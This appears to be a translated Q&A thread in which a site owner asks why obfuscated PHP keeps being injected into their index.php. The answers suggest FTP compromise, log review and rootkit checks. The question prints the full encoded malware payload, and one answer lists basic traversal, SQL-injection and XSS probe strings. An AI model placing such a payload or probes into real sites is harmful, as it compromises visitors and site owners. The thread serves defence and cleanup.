为什么这个恶意代码会一直附加到我的index.php文件中?

时间:2012-04-27 08:16:13

标签: php security malware

我的互联网网站继续感染以下代码。我继续删除它,有一天可能它又在那里。请帮助。

#d93065#
echo(gzinflate(base64_decode("tVXbjptADP2VNi+BRmmZgbkglr70E/qIeIgTyLLahhRQ0CrKv9c2QzbZknRVaZWLPB7P8bF9Bh7adVPtu+9VGiRd83LcN3VXdy/7IjmtV9360Su2Rb9tN/6xTLP5MpRAPx2BFrCMYSlAxWACUBaMBm1BB6DRo0CBlrRCU6Lb8M7FvolAKrABRCEoTcGhYYNjEHgpQRnGjikMl2giHiiyLDJB3JHRKysTvqKgjUABCHsVbCPiTkwM0aB08RTg7dKMJWxMiCvH1oCIJyggMqYgjwXJVeiQy8evAIFtwQ/WaQc2hiH4vKJThrct8SCT01sQzEEwFDeKslg6qjgC/UMuPOi20UX8I54KM3gbYbiagQeGDtsDIWpSRCzpvHF1YyTRD11aFbsGYbORFBGOxg5FtKQtnrDirpuhYO1aKM4aEeTBSMNIipHE2YGcpOBWTzRb8hwm532xpEPcS2Wv2C3jOxKakIfhaiggdtdB8rxvy0YNsgn4HJc9eTUG8U9oSQ61oVs54dIco1FPoZvSuakD0Fl/aIcfpcArYpc6Uv/Q0PlSvJEROm8j3tDXgHVLYvcQL7XnlH+fwajL6eD3Tub6zo7zcXfyf2b99zWfAn3/g+4Dn+GKb4FgFTEgxkjtlIC5FL9e9OTze55nQf613T9XnTeHuZ8c0lkxW8wOK/x7niWnqvQOfpH21W5T99kh55fbrug/CanGV9vvfusf+7RM2jTLk1OT/uyaardNyrrxEqXN57RKqkUq/OMTWaVX+G3aLppsVmKWBn/1rx/4/7gim6x6U8xyr8+e8i9iEQmfeRR+4bV+8vDNvWr/AA==")));
#/d93065#

编辑:有没有办法找出代码是如何再次发生的。可能来自提供商还是什么? 我还必须说我的所有账户不仅被感染了一个。

4 个答案:

答案 0 :(得分:3)

我的建议是您的FTP帐户已遭到入侵。更改您的FTP密码,不要将其存储在任何地方,清理您的网络并等待它有用。如果将FTP密码存储在计算机中,请仔细检查其是否存在病毒/恶意软件。某些恶意软件可能会抓住您存储的FTP密码,例如在Total Commander的FTP帐户列表中。

答案 1 :(得分:2)

查看您的PHP代码。在某个地方可能存在一些漏洞,允许攻击者修改您的文件。或者您的Web服务器可能容易受到攻击。

它回来的原因是因为某人(或机器人/脚本)反复执行此操作并且您没有保护运行应用程序的所有部分,即服务器+代码。

与@pomeh建议一样,监控服务器日志以查看正在访问哪些文件以查看其发生情况。

答案 2 :(得分:0)

您的网站可能会受到攻击。而且由于你没有修复打开的“漏洞”,攻击者可以再次注入代码。

答案 3 :(得分:0)

我首先检查服务器日志和ftp日志,这应该会给你一个提示问题的位置。我的猜测是你的网站遭到入侵,用户留下了一个简单的php shell,以便进一步访问,这是大多数情况下的情况。这可以通过查看日志来揭示;这可能有点及时,并且需要一个至少缺乏经验的人(例如遍历包含尝试 - ../,sql注入尝试 - and 1=1,xss - <script>alert ,这些只是最基本的例子)。 然而,如果有更严重的入侵,那么发现它将更难以发现,因为人们可以通过清除日志来掩盖他的踪迹,所以我可能也会检查rootkit是为了安全。 此外,它取决于您是否在共享主机上,在这种情况下,混乱的服务器权限可能导致您的网站因其他网站遭到入侵而容易受到攻击。很多网站都受到这种方式的攻击,大多数中小型托管服务提供商在这方面都没有提供足够的安全性,实质上使您的网站只能像服务器上托管的最不安全的网站一样安全。 如其他答案中所述,如果您使用开源解决方案通过谷歌检查,或者例如在http://www.exploit-db.com/,如果最近发布了任何漏洞利用。最后,您可能需要检查服务器以及它正在运行的服务。